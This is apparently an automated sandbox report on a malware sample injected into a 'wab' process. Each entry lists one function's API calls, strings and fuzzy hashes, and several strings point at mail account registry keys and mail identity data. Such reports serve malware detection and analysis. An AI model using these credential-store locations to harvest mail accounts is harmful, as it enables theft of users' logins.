                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • memset.MSVCRT ref: 00408258
                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                    Strings
                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Close$EnumOpenmemset
                    • String ID: Software\Google\Google Desktop\Mailboxes
                    • API String ID: 2255314230-2212045309
                    • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                    • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                    Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040C28C
                    • SetFocus.USER32(?,?), ref: 0040C314
                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FocusMessagePostmemset
                    • String ID: S_@$l
                    • API String ID: 3436799508-4018740455
                    • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                    • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                    Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004092C0
                    • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                    • _mbscpy.MSVCRT ref: 004092FC
                    Strings
                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString_mbscpymemset
                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                    • API String ID: 408644273-3424043681
                    • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                    • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                    • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                    • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                    Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy
                    • String ID: C^@$X$ini
                    • API String ID: 714388716-917056472
                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                    Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                    • String ID: MS Sans Serif
                    • API String ID: 3492281209-168460110
                    • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                    • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                    Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClassName_strcmpimemset
                    • String ID: edit
                    • API String ID: 275601554-2167791130
                    • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                    • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                    Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$_mbscat
                    • String ID: 3CD
                    • API String ID: 3951308622-1938365332
                    • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                    • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                    Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: rows deleted
                    • API String ID: 2221118986-571615504
                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                    Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$memset
                    • String ID:
                    • API String ID: 1860491036-0
                    • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                    • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                    Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                    Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                    Download Yara Rule
                    APIs
                    • __allrem.LIBCMT ref: 00425850
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                    • __allrem.LIBCMT ref: 00425933
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                    Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                    • too many SQL variables, xrefs: 0042C6FD
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                    • API String ID: 2221118986-515162456
                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                    Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                    • memset.MSVCRT ref: 004026AD
                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                      • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                    • LocalFree.KERNEL32(?), ref: 004027A6
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                    • String ID:
                    • API String ID: 1593657333-0
                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                    Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                    • strlen.MSVCRT ref: 0040B60B
                    • atoi.MSVCRT ref: 0040B619
                    • _mbsicmp.MSVCRT ref: 0040B66C
                    • _mbsicmp.MSVCRT ref: 0040B67F
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbsicmp$??2@??3@atoistrlen
                    • String ID:
                    • API String ID: 4107816708-0
                    • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                    • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                    Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                    • String ID:
                    • API String ID: 1886415126-0
                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                    Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: >$>$>
                    • API String ID: 39653677-3911187716
                    • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                    • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                    Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: @
                    • API String ID: 3510742995-2766056989
                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                    Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi
                    • String ID: C@$mail.identity
                    • API String ID: 1439213657-721921413
                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                    Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00406640
                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                      • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                      • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                    • memcmp.MSVCRT ref: 00406672
                    • memcpy.MSVCRT ref: 00406695
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset$memcmp
                    • String ID: Ul@
                    • API String ID: 270934217-715280498
                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                    Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                    • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                    Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                    Strings
                    • recovered %d pages from %s, xrefs: 004188B4
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                    • String ID: recovered %d pages from %s
                    • API String ID: 985450955-1623757624
                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                    Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _ultoasprintf
                    • String ID: %s %s %s
                    • API String ID: 432394123-3850900253
                    • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                    • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                    Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadMenuA.USER32(00000000), ref: 00409078
                    • sprintf.MSVCRT ref: 0040909B
                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                    • String ID: menu_%d
                    • API String ID: 1129539653-2417748251
                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                    Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • failed memory resize %u to %u bytes, xrefs: 00411706
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _msizerealloc
                    • String ID: failed memory resize %u to %u bytes
                    • API String ID: 2713192863-2134078882
                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                    Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                    • strrchr.MSVCRT ref: 00409808
                    • _mbscat.MSVCRT ref: 0040981D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleName_mbscatstrrchr
                    • String ID: _lng.ini
                    • API String ID: 3334749609-1948609170
                    • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                    • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                    Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                    • _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                    • _mbscat.MSVCRT ref: 004070FA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$_mbscpystrlen
                    • String ID: sqlite3.dll
                    • API String ID: 1983510840-1155512374
                    • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
